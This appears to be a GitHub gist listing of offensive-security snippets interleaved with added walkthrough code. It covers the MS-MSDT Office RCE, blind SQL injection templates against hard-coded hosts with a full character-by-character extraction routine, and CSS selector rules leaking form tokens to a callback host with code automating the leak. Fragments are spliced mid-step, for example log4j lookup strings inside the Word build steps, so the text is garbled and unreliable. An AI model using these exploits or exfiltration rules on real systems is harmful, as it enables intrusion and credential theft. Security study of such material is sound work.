@abdilahrf
abdilahrf / ms-msdt.MD
Created June 4, 2022 05:42 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE object references that point at HTML files. There is a URL scheme, "ms-msdt:", which invokes the msdt diagnostic tool, and msdt is capable of executing arbitrary code specified in its parameters.

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
${ctx:loginId}
${map:type}
$(unknown)
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file.
# python burplist.py burprequests.xml
# output is saved to wordlist.txt
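The comment block above describes the workflow (export Burp proxy history as XML, feed it to burplist.py, get wordlist.txt) but the preview stops before the parsing code. The following is an added example, not the gist's own code, that does the same job end to end: it parses the XML that Burp's "Save Items" writes, base64-decodes each request, and collects path segments, file names and parameter names into a deduplicated wordlist. The sample XML is constructed for the demo; the element names (items/item/request with base64="true") follow Burp's export format.

```python
"""Build a wordlist from a Burp Suite "Save Items" XML export (added example)."""
import base64
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests, base64-encoded the way Burp stores them.
_REQ1 = b"GET /api/v2/users/42?sort=name&page=1 HTTP/1.1\r\nHost: shop.example.com\r\n\r\n"
_REQ2 = (b"POST /admin/login.php HTTP/1.1\r\nHost: shop.example.com\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n\r\nusername=admin&password=x")

SAMPLE_XML = """<?xml version="1.0"?>
<items burpVersion="2022.1">
  <item>
    <url>https://shop.example.com/api/v2/users/42?sort=name&amp;page=1</url>
    <method>GET</method>
    <path>/api/v2/users/42?sort=name&amp;page=1</path>
    <request base64="true">{}</request>
    <status>200</status>
  </item>
  <item>
    <url>https://shop.example.com/admin/login.php</url>
    <method>POST</method>
    <path>/admin/login.php</path>
    <request base64="true">{}</request>
    <status>302</status>
  </item>
</items>""".format(base64.b64encode(_REQ1).decode(), base64.b64encode(_REQ2).decode())


def decode_request(node):
    """Return the raw request bytes of a <request> element (base64 or plain text)."""
    text = node.text or ""
    if node.get("base64") == "true":
        return base64.b64decode(text)
    return text.encode("latin-1")


def words_from_request(raw):
    """Extract path segments, file stems and query/body parameter names from one request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    parts = request_line.split(" ")
    if len(parts) < 2:
        return set()
    target = urlsplit(parts[1])
    words = set()
    for seg in target.path.split("/"):
        # skip empty and purely numeric segments (IDs are noise in a wordlist)
        if seg and not seg.isdigit():
            words.add(seg)
            stem = seg.rsplit(".", 1)[0]      # login.php -> login
            if stem:
                words.add(stem)
    for name, _ in parse_qsl(target.query, keep_blank_values=True):
        words.add(name)
    if body:
        for name, _ in parse_qsl(body.decode("latin-1", "replace"), keep_blank_values=True):
            words.add(name)
    return words


def build_wordlist(xml_text):
    """Parse a Burp items export and return a sorted, deduplicated wordlist."""
    root = ET.fromstring(xml_text)
    words = set()
    for item in root.iter("item"):
        req = item.find("request")
        if req is None:
            continue
        words |= words_from_request(decode_request(req))
    return sorted(words)


if __name__ == "__main__":
    # Equivalent of: python burplist.py burprequests.xml > wordlist.txt
    for word in build_wordlist(SAMPLE_XML):
        print(word)
```

Write the result to wordlist.txt and feed it to a content-discovery tool; the stem entries (login for login.php) let the same list be reused with other extensions.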
@abdilahrf
abdilahrf / blind_sqlinjection.py
Last active December 8, 2020 00:39
Blind SQL injection Template
import requests
import re
url = "http://88.198.233.174:33534/index.php"
payload = {
"username":"",
"password":"x",
}
def check(data):
input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);}
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);}
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);}
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);}
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);}
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);}
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);}
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);}
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1);
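The selectors above leak only the first character of the input's value (value^=a, value^=b, ...). The general technique repeats this per injection round: each round emits one rule per candidate character for the prefix already learned, the browser requests exactly the background-image URL whose selector matches, and the callback server records the next character. The following is an added example, not the gist's own code; it goes beyond the page's single-round selectors by driving the whole loop. The callback host, field name and charset are assumptions, and simulate_round() stands in for the browser's selector matching so the example runs offline.

```python
"""CSS attribute-selector exfiltration: rule generation plus an offline simulation."""
import string
from urllib.parse import quote

CALLBACK = "https://callback.yourdomain.com/callback"   # assumed callback endpoint
CHARSET = string.ascii_lowercase + string.digits        # assumed token alphabet


def build_rules(field_suffix, prefix, charset=CHARSET, callback=CALLBACK):
    """One CSS rule per candidate next character, given the prefix learned so far."""
    rules = []
    for ch in charset:
        cand = prefix + ch
        url = "%s?token=%s&id=%s" % (callback, quote(cand, safe=""), field_suffix.upper())
        rules.append(
            'input[name$=%s][value^="%s"]{background-image:url(%s);}' % (field_suffix, cand, url)
        )
    return "\n".join(rules)


def simulate_round(secret, prefix, charset=CHARSET):
    """Stand-in for the browser: the candidate whose [value^=...] matches, or None."""
    for ch in charset:
        cand = prefix + ch
        if secret.startswith(cand):      # exactly what value^="cand" tests
            return cand
    return None


def extract_value(secret, charset=CHARSET):
    """Run rounds until no candidate matches; the prefix is then the full value.

    In a real attack each round is a fresh injection of build_rules(...) and the
    next prefix comes from the token parameter seen by the callback server.
    """
    prefix = ""
    while True:
        hit = simulate_round(secret, prefix, charset)
        if hit is None:
            return prefix
        prefix = hit


if __name__ == "__main__":
    print(build_rules("code_1", "a").splitlines()[0])
    print(extract_value("x7k2q"))
```

Characters outside the charset stop the loop early, so the alphabet has to match what the target field can contain; quoting the value in the selector avoids breaking the rule when the prefix reaches a character that is not a valid CSS identifier.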
@abdilahrf
abdilahrf / a-z.md
Created April 27, 2020 13:27 — forked from stypr/a-z.md
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)

A-z

Simple JS Jail challenge.

It is run in a context, so we have nothing to play with but constructor and console.

1337 === eval(our_input)
@abdilahrf
abdilahrf / crt.sh
Created September 13, 2017 16:31 — forked from 1N3/crt.sh
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
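The preview above stops at the colour definitions; the script itself fetches crt.sh with curl and scrapes the HTML. crt.sh also answers the same query with output=json, which is easier to consume reliably. The following is an added example, not the gist's own code: it builds the query URL and parses a crt.sh JSON response into a sorted, deduplicated list of hostnames under the target domain, splitting the newline-separated name_value field and dropping wildcard prefixes. The response embedded below is constructed for the demo and mirrors the field names crt.sh returns.

```python
"""Collect sub-domains from a crt.sh JSON response (added example, runs offline)."""
import json
from urllib.parse import quote

CRTSH_URL = "https://crt.sh/?q=%s&output=json"


def crtsh_query_url(domain):
    """URL for every certificate covering %.domain (the % must be URL-encoded as %25)."""
    return CRTSH_URL % quote("%." + domain, safe="")


def parse_crtsh(json_text, domain):
    """Return sorted unique hostnames under `domain` from a crt.sh JSON response."""
    names = set()
    domain = domain.lower()
    suffix = "." + domain
    for record in json.loads(json_text):
        # name_value holds the CN plus every SAN, separated by newlines
        for raw in record.get("name_value", "").split("\n"):
            host = raw.strip().lower()
            if host.startswith("*."):
                host = host[2:]                 # wildcard cert: keep the base name
            if not host:
                continue
            # only names under the target; drops look-alikes such as example.com.evil.net
            if host == domain or host.endswith(suffix):
                names.add(host)
    return sorted(names)


# Constructed sample in crt.sh's JSON shape: two records, the second with a SAN list.
SAMPLE_RESPONSE = json.dumps([
    {"issuer_ca_id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com", "name_value": "www.example.com\nexample.com",
     "id": 1001, "entry_timestamp": "2022-01-01T00:00:00",
     "not_before": "2022-01-01T00:00:00", "not_after": "2022-04-01T00:00:00",
     "serial_number": "01"},
    {"issuer_ca_id": 1, "issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\napi.example.com\nexample.com.evil.net",
     "id": 1002, "entry_timestamp": "2022-02-01T00:00:00",
     "not_before": "2022-02-01T00:00:00", "not_after": "2022-05-01T00:00:00",
     "serial_number": "02"},
])


if __name__ == "__main__":
    print(crtsh_query_url("example.com"))
    for host in parse_crtsh(SAMPLE_RESPONSE, "example.com"):
        print(host)
```

To use it live, fetch crtsh_query_url(domain) with urllib or requests and pass the response body to parse_crtsh(); crt.sh is slow and rate-limited, so cache the raw JSON rather than re-querying on every run.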
@abdilahrf
abdilahrf / legcountersolve.py
Last active October 3, 2019 10:25
Leg counter web challenge solver (Blind SQLi Template)
import requests
import re
from StringIO import StringIO
from pycurl import *
import os
import pickle
url = "http://103.56.207.107:50001/upload.php"
payload = {
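Both templates on this page (blind_sqlinjection.py above and legcountersolve.py here) follow the same pattern: POST a username/password pair with an injected condition and let check() decide from the response whether the condition was true. Their previews stop before the extraction loop, so the following added example, not the gists' own code, carries the technique through end to end. To run offline, the target is an in-memory SQLite database behind a deliberately string-concatenated login query (vulnerable_login); check() plays the role of the templates' response check, and extract() recovers a column value one character at a time with a binary search on unicode(substr(...)), so each character costs about seven requests instead of one per candidate character. Table, column and credential names are constructed for the demo.

```python
"""Boolean-based blind SQL injection, worked end to end against a local oracle."""
import sqlite3

# Constructed target: one table, one row.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'S3cr3t_pw!')")


def vulnerable_login(username, password):
    """The target: string-concatenated query, i.e. the bug the templates exploit."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def check(condition):
    """Boolean oracle: True iff the injected SQL condition holds.

    Mirrors check(data) in the templates, which look for a success marker in
    the HTTP response; here the marker is simply a successful login.
    """
    payload = "admin' AND (%s)-- " % condition
    return vulnerable_login(payload, "x")


def extract(column, table, where, max_len=64):
    """Recover one column value character by character via binary search."""
    result = ""
    for pos in range(1, max_len + 1):
        # stop once the value has no character at this position
        if not check("length((SELECT %s FROM %s WHERE %s)) >= %d"
                     % (column, table, where, pos)):
            break
        lo, hi = 0, 127                      # search the ASCII range
        while lo < hi:
            mid = (lo + hi + 1) // 2
            cond = ("unicode(substr((SELECT %s FROM %s WHERE %s),%d,1)) >= %d"
                    % (column, table, where, pos, mid))
            if check(cond):
                lo = mid                     # character code is >= mid
            else:
                hi = mid - 1
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(extract("password", "users", "username='admin'"))
```

Against a real target, replace vulnerable_login() with the HTTP request from the template and make check() test the response body or status the way the challenge distinguishes a true from a false condition; the comment sequence and string functions (unicode, substr, length here) change with the database engine.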
@abdilahrf
abdilahrf / dynamic_hmac_signature.py
Created October 3, 2019 10:23
Burp Suite extender for dynamically generating request signatures
from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IScannerListener
from burp import IExtensionStateListener
from java.io import PrintWriter
from burp import IParameter
import datetime
import hashlib
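The extender above recomputes a signature for every request Burp sends so that edited requests are still accepted by an API that signs its traffic. The exact scheme it implements is not visible in this preview, so the following added example, not the gist's own code, uses an assumed one: the client signs METHOD, path, timestamp and SHA-256 of the body with HMAC-SHA256 under a shared key and sends X-Timestamp and X-Signature headers. It also shows the server side of the same scheme, which is what makes the Burp-side recomputation necessary: a constant-time comparison and a timestamp window so a captured request cannot be replayed later. The key, header names and endpoint are constructed for the demo.

```python
"""Dynamic HMAC request signing with the matching server-side verification."""
import hashlib
import hmac
import time

SHARED_KEY = b"demo-shared-secret"   # constructed for the example
MAX_SKEW = 300                        # seconds a signed request stays valid


def canonical_string(method, path, timestamp, body):
    """The bytes that get signed; hashing the body keeps large bodies cheap to sign."""
    body_hash = hashlib.sha256(body).hexdigest()
    return "\n".join([method.upper(), path, str(timestamp), body_hash]).encode()


def sign_request(method, path, body, key=SHARED_KEY, timestamp=None):
    """Headers the client (or the Burp extender, on every outgoing request) adds."""
    ts = int(time.time()) if timestamp is None else int(timestamp)
    mac = hmac.new(key, canonical_string(method, path, ts, body), hashlib.sha256).hexdigest()
    return {"X-Timestamp": str(ts), "X-Signature": mac}


def verify_request(method, path, body, headers, key=SHARED_KEY, now=None):
    """Server side: reject missing, stale or mismatching signatures. Returns (ok, reason)."""
    try:
        ts = int(headers["X-Timestamp"])
        sig = headers["X-Signature"]
    except (KeyError, ValueError):
        return False, "missing or malformed signature headers"
    now = int(time.time()) if now is None else int(now)
    if abs(now - ts) > MAX_SKEW:
        return False, "timestamp outside the allowed window"
    expected = hmac.new(key, canonical_string(method, path, ts, body), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):   # constant-time comparison
        return False, "signature mismatch"
    return True, "ok"


if __name__ == "__main__":
    body = b'{"amount": 10}'
    hdrs = sign_request("POST", "/api/transfer", body)
    print(verify_request("POST", "/api/transfer", body, hdrs))
    # Editing the body after signing (what happens in Repeater without the extender):
    print(verify_request("POST", "/api/transfer", b'{"amount": 9999}', hdrs))
```

In a Burp extender the sign_request() step runs in processHttpMessage() for outgoing requests only, replacing the two headers before the request leaves the proxy; the window check on the server is why a stale Repeater request fails even when its signature was once valid.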